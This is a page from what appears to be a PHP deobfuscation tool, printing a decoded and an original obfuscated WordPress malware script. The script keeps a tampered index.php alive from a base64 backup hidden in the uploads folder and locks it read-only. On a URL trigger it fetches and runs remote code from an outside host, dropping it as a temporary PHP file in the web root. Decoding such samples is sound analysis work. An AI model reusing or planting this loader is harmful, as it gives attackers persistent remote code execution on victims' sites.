Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto HpOO69Ry1d; HpOO69Ry1d: $idx_path = $_SERVER["\104\x4f\103\125\x4d\105\116\12..

Decoded Output download

<?php 
 goto HpOO69Ry1d; HpOO69Ry1d: $idx_path = $_SERVER["DOCUMENT_ROOT"] . "/index.php"; $bk_idex_path = 'wp-content/uploads/sites/35icxdD.log'; $bk_idx_path = $_SERVER["DOCUMENT_ROOT"] . "/" . $bk_idex_path; $idx_size = 11633; if (!(!file_exists($idx_path) or filesize($idx_path) != $idx_size)) { goto jRy_2JFE7d; } goto kJXnpF5aVd; w94S_Kn7No: $arrContextOptions = array("ssl" => array("verify_peer" => false, "verify_peer_name" => false), "http" => array("method" => "GET", "timeout" => "3")); $http = isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on" ? "https" : "http"; $host = $_SERVER["HTTP_HOST"]; $cyurl = $http . "://" . $host . "/cyborg_tmp.php"; @file_get_contents($cyurl, false, stream_context_create($arrContextOptions)); goto SNVm8SFTYf; tY6TYLmqXb: @chmod($idx_path, 0444); CdZjOYUJq1: jRy_2JFE7d: if (!($_GET["line"] == "a")) { goto RO1J_mEJaW; } if (file_exists($bk_idx_path)) { goto em8TCaIoKf; } goto RlpTctwUgf; kJXnpF5aVd: if (!file_exists($bk_idx_path)) { goto CdZjOYUJq1; } $idx_code = @file_get_contents($bk_idx_path); @chmod($idx_path, 438); @unlink($idx_path); @file_put_contents($idx_path, base64_decode($idx_code)); goto tY6TYLmqXb; RlpTctwUgf: echo "lost log"; em8TCaIoKf: echo filesize($idx_path); RO1J_mEJaW: if (!(filesize($idx_path) == $idx_size && $_GET["cy"] == "1")) { goto DeoOshLI0M; } goto OA_HO71Y5w; OA_HO71Y5w: $d = "http://s.newnday.xyz/cy/cy.gif"; $cy_code = @file_get_contents($d); if (!$cy_code) { goto AuDaMkhRA2; } $cy_path = $_SERVER["DOCUME" . "NT_ROOT"] . "/cyborg_tmp.php"; @file_put_contents($cy_path, $cy_code); goto w94S_Kn7No; SNVm8SFTYf: $success = @unlink($cy_path); AuDaMkhRA2: goto Ods0bmfeB3; Ods0bmfeB3: DeoOshLI0M: ?>

Did this file decode correctly?

Original Code

<?php
 goto HpOO69Ry1d; HpOO69Ry1d: $idx_path = $_SERVER["\104\x4f\103\125\x4d\105\116\124\x5f\122\117\117\124"] . "\x2f\151\x6e\x64\x65\170\x2e\160\x68\160"; $bk_idex_path = 'wp-content/uploads/sites/35icxdD.log'; $bk_idx_path = $_SERVER["\104\117\103\125\x4d\x45\x4e\x54\137\122\117\x4f\124"] . "\57" . $bk_idex_path; $idx_size = 11633; if (!(!file_exists($idx_path) or filesize($idx_path) != $idx_size)) { goto jRy_2JFE7d; } goto kJXnpF5aVd; w94S_Kn7No: $arrContextOptions = array("\x73\x73\154" => array("\166\145\x72\x69\146\171\x5f\x70\145\145\162" => false, "\166\x65\x72\x69\146\171\x5f\x70\x65\x65\x72\x5f\x6e\141\155\145" => false), "\150\x74\x74\x70" => array("\x6d\x65\x74\150\157\x64" => "\x47\105\124", "\164\151\x6d\145\157\165\x74" => "\x33")); $http = isset($_SERVER["\x48\124\124\120\x53"]) && $_SERVER["\110\124\124\120\x53"] == "\157\156" ? "\x68\164\x74\x70\x73" : "\x68\x74\164\x70"; $host = $_SERVER["\x48\124\x54\x50\x5f\110\117\123\x54"]; $cyurl = $http . "\x3a\x2f\57" . $host . "\x2f\x63\171\142\x6f\162\147\x5f\164\x6d\160\56\160\x68\160"; @file_get_contents($cyurl, false, stream_context_create($arrContextOptions)); goto SNVm8SFTYf; tY6TYLmqXb: @chmod($idx_path, 0444); CdZjOYUJq1: jRy_2JFE7d: if (!($_GET["\154\151\x6e\145"] == "\x61")) { goto RO1J_mEJaW; } if (file_exists($bk_idx_path)) { goto em8TCaIoKf; } goto RlpTctwUgf; kJXnpF5aVd: if (!file_exists($bk_idx_path)) { goto CdZjOYUJq1; } $idx_code = @file_get_contents($bk_idx_path); @chmod($idx_path, 438); @unlink($idx_path); @file_put_contents($idx_path, base64_decode($idx_code)); goto tY6TYLmqXb; RlpTctwUgf: echo "\154\x6f\163\x74\40\x6c\157\x67"; em8TCaIoKf: echo filesize($idx_path); RO1J_mEJaW: if (!(filesize($idx_path) == $idx_size && $_GET["\143\x79"] == "\61")) { goto DeoOshLI0M; } goto OA_HO71Y5w; OA_HO71Y5w: $d = "\150\164\164\160\72\57\57\x73\x2e\x6e\145\167\x6e\x64\x61\171\56\170\171\172\x2f\143\x79\x2f\x63\x79\x2e\147\151\146"; $cy_code = @file_get_contents($d); if (!$cy_code) { goto AuDaMkhRA2; } $cy_path = $_SERVER["\104\x4f\x43\125\x4d\105" . "\116\x54\137\122\117\117\x54"] . "\57\x63\x79\x62\x6f\x72\x67\x5f\x74\x6d\x70\56\x70\150\x70"; @file_put_contents($cy_path, $cy_code); goto w94S_Kn7No; SNVm8SFTYf: $success = @unlink($cy_path); AuDaMkhRA2: goto Ods0bmfeB3; Ods0bmfeB3: DeoOshLI0M:

Function Calls

None

Variables

None

Stats

MD5 b72afaff57744f590bb1930b3ff108a7
Eval Count 0
Decode Time 36 ms